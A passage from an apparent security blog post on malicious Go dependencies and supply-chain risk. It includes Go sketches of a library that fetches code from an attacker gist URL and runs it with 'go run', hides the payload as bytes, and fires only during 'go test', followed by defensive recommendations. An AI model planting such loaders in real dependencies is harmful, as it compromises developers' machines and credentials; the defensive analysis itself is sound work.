Importing lib1 above, the main application will work as normal. However, it will also serve every file in the machine's root folder when the /s/ path is requested:

This allows end users of the web application to access any file that your application has access to.

That is just a silly example, but again: once your dependencies go rogue, and they are guaranteed to have execution precedence, they have considerable leeway in what they can do.

Ideas on implementation…

One of the great things about golang is that you don't need to package your libraries to distribute them. You import a package directly from its repository. Ultimately, what you see in someone's repository is what you get when you import it.

Therefore, any malicious code would need to conceal its intentions to avoid being caught in a simple code review (assuming that developers actually review the entirety of their dependencies). It may also hide behind some bad programming practices, as long as they do not make its actual purpose too obvious.

Below are three potential implementations:

1. Allowing remote behaviour changes

This example downloads a golang gist from GitHub and executes it locally:
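
A sketch of how that could work. The gist URL, the helper name fetchAndRun, and the 32-byte threshold are all illustrative stand-ins:

```go
package main

import (
	"io"
	"net/http"
	"os"
	"os/exec"
	"path/filepath"
)

// fetchAndRun downloads a Go source file and executes it with "go run".
// In the real attack this would be called from an innocuous-looking
// init().
func fetchAndRun(url string) error {
	resp, err := http.Get(url)
	if err != nil {
		return err
	}
	defer resp.Body.Close()

	// Kill switch: if the attacker replaces the gist with a tiny one,
	// the payload silently disables itself. ContentLength is -1 when
	// unknown, which also skips execution.
	if resp.ContentLength < 32 {
		return nil
	}

	src, err := io.ReadAll(resp.Body)
	if err != nil {
		return err
	}

	dir, err := os.MkdirTemp("", "cache")
	if err != nil {
		return err
	}
	defer os.RemoveAll(dir)

	path := filepath.Join(dir, "main.go")
	if err := os.WriteFile(path, src, 0o600); err != nil {
		return err
	}
	return exec.Command("go", "run", path).Run()
}

func main() {
	// Placeholder URL: a real payload would point at an
	// attacker-controlled gist's raw content.
	_ = fetchAndRun("https://gist.githubusercontent.com/attacker/payload/raw")
}
```

Note that every error is swallowed: a payload like this wants to fail silently, never crash its host.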

This allows an attacker to change the behaviour remotely, and even disable it entirely, by publishing a really small gist (note the ContentLength check).

2. Self-contained

Another approach could be to embed the malicious implementation with the rest of the code, but stored in a different format, for example as binary data:
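
A sketch of the idea. To keep it harmless, the byte payload here spells just "package main"; a real one would hold the full download-and-execute source from the first example:

```go
package main

import "fmt"

// a holds Go source code as raw bytes rather than as a string literal,
// so a grep for suspicious strings or URLs turns up nothing. A real
// payload would be written to a temp file and run exactly as in the
// previous example.
var a = []byte{0x70, 0x61, 0x63, 0x6b, 0x61, 0x67, 0x65, 0x20, 0x6d, 0x61, 0x69, 0x6e}

func main() {
	// "Decoding" is a plain string conversion at run time.
	fmt.Println(string(a)) // prints "package main"
}
```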

The variable a above contains the implementation of the first example encoded as bytes, so it downloads and executes exactly the same gist. However, it makes it far less obvious that a web request is being made.

Please note that those binary contents could just as well be the implementation of a Go reverse shell, which would give the attacker shell access to the machine that executed it.

3. Disguising execution

A serious implementation of this would lie dormant and try to execute only when it won't be noticed. One potential way for the code to compile and execute unnoticed would be to run only while the developer is running their application's tests. This also increases the likelihood of a Go environment being set up on the machine.

When you run your tests, you are actually running a specially compiled version of your source code; on Linux machines that executable is a temporary file suffixed with .test. The example below runs example 2 only during test executions:
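
A sketch of the check, extracted into a helper (looksLikeTestBinary is our name for it, not a standard function):

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// looksLikeTestBinary reports whether the given argv[0] looks like the
// temporary executable "go test" produces on Linux, which is suffixed
// with ".test".
func looksLikeTestBinary(argv0 string) bool {
	return strings.HasSuffix(argv0, ".test")
}

func main() {
	if looksLikeTestBinary(os.Args[0]) {
		// In the real attack, this is where the previous example's
		// download-and-execute payload would fire.
		fmt.Println("running under go test")
	}
}
```

The check costs nothing when false, so the library behaves impeccably in production while misbehaving only on developer and CI machines.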

Note that this means a developer would trigger the malicious code simply by running their application's tests.

What aggravates this scenario is that developers tend to be quite privileged on their own machines. And even when they are not, nowadays there is a reasonable chance of them having:

Docker installed, with their user in the docker group, which by itself provides extremely easy privilege-escalation options.

Cloud credentials on their machines, allowing access to other environments.

Hiding in plain-sight…

This implementation could probably be reduced to even fewer lines of code and scattered across a few files; after all, packages can have multiple init() functions and package-level variable initialisations. :)

If well named and arranged precisely to mingle with the rest of the library's code, this could well pass unnoticed. Remember the power of init(): it allows this code to be buried under several layers of imports and still run before everything else.
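
That ordering is easy to verify. The small program below records which hook runs when; the hook names are just labels for the demonstration:

```go
package main

import "fmt"

// calls records the order in which the three hooks below execute.
var calls []string

func sneak(where string) string {
	calls = append(calls, where)
	fmt.Println("executed from", where)
	return where
}

// A package-level variable initialiser runs first...
var _ = sneak("package-level var")

// ...then every init() in the package...
func init() { sneak("init()") }

// ...and only then does main() get a chance to run.
func main() { sneak("main()") }
```

Running this prints the three lines in exactly that order, which is why a payload buried in a deep transitive import still executes before any application code.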

What could be the impact then?

In terms of what can be achieved with this, here are a few ideas of what may happen when malicious code is executed on development machines or in your build pipelines:

Exfiltration of SSH/GPG keys, cloud credentials (example for dotnet with nuget packages), etc.

Injection of malicious code into the compiled binary, spreading the attack to other environments.

The last point assumes that the entry point could also be a dependency of a test framework or a build tool, such as a fuzzer.

Once the malicious code arrives in production:

Exfiltration of production data and credentials.

Changes in application behaviour.

Disruption of services.

And in all cases, there is always the possibility of the execution of reverse shells, or the installation of malware, crypto-miners, ransomware, and so on.

Ok, but how likely is this to happen?

It all depends on the processes you have in place. But here are a few things to consider about how malicious code could make its way into your dependencies:

1. Security Carelessness

We tend to implicitly trust project maintainers and open source contributors to take security seriously. But there is no way to assess, let alone enforce, their basic security hygiene and posture.

2. Disgruntled employees/contributors

Someone who left a project or company on bad terms but still has access to key assets and credentials. An example could be an employee who left a company, leaving behind several projects that depend on open source repositories the employee still has access to.

3. Malicious contributors

Some people may play the long game to attain the status of maintainers, and use that to pursue dishonest ends. An example of social engineering in the open source community:

the hacker was able to take over maintainership of a popular module in the NPM ecosystem. Doing so established a bit of a history, giving the hacker the look of a real maintainer. Then, the module’s actual maintainer handed over maintenance of this package and later explained he did so because he wasn’t compensated for maintaining the module and hadn’t used it in years.

This is not the first such example and it won't be the last; here's another one.

Certainly there are other actors and vectors to consider when threat modelling this, but these should be a good start.

Recommendations

Here are a few recommendations that will decrease the likelihood of this happening to you, and limit the damage when it does.

1. Have your own criteria to select or veto dependencies

Before adding dependencies, ensure they adhere to a set of criteria you and your team are happy with:

Is this project well-maintained?

Are the maintainers trustworthy and involved in multiple projects?

Does the project have security hygiene policies that are public (i.e. all contributors must use 2FA and GPG sign their commits)?

How deep are this project's dependencies? By adding this dependency, how many other dependencies will I "implicitly inherit"?

Do the dependencies of this project also pass my veto criteria?

2. Isolated Development Environment

Take a zero trust approach and run your development environment isolated from your personal machine by using VMs, containers or remote machines.

The VS Code Remote extensions make this process seamless and also make it easier to keep disposable development environments, decreasing the likelihood of a compromised application or environment affecting others.

3. One-Time Build Pipelines

Expanding zero trust to your build pipelines, ensure that each build runs on a clean machine/container, so that no persistent threat can outlive a build process and contaminate other builds.

Do not share the same build-machine instance across different applications, and isolate critical processes, such as the building and packaging of your binaries, from everything else, including the execution of tests and the running of other third-party tools.

This is extremely simple to implement nowadays with services such as GitHub Actions and Azure Pipelines, so there is no excuse not to do it.

4. Isolation at run-time

Run your application as if you did not trust it. Use containers to run it in any environment, and use the following security mechanisms to limit its capabilities:

Use zero trust network concepts and whitelist only ingress and egress that are required for the application to run.

Implement seccomp to whitelist the system calls your application uses.

Implement SELinux and/or AppArmor to further whitelist the behaviour allowed by the application inside the container.

Drop all Linux Capabilities that are not required.

Run the container with --no-new-privileges and using a non-root user.

5. Managing Dependencies

A few recommendations on how to manage dependencies:

Fork projects that are not well-maintained and treat the fork as the source of truth. In this case, your application imports your fork instead of the upstream. All upstream changes should be dealt with as pull requests into your fork, together with all the implications that entails.

Vendor your dependencies and version control them; this makes it easier to code review changes as part of your application development.

Always code review your dependencies before adding them to your project.

Closing thoughts…

Ultimately, this is not a problem exclusive to golang, it is rather a problem of implicit trust. It is the same in most development languages, although some are more easily exploitable than others.

We, developers, need to be cognisant that we are responsible for all the code we add to our applications, regardless of who actually wrote it. In the same way that code review is a good practice for our teammates' changes, the same applies to open source contributions in our dependencies: we should review them.

No mitigation will be as efficient as not depending on a malicious dependency in the first place, so take into consideration one of the Go proverbs:

A little copying is better than a little dependency.

Sometimes you don’t actually need to take on a full dependency. You could instead develop the functionality yourself, or simply copy the part of the code you need, keeping the author and license details intact, of course. :)

And as a closing point, refrain from using libraries that are reckless and carry unnecessary or poorly maintained dependencies; quoting Carlos Ruiz Zafón: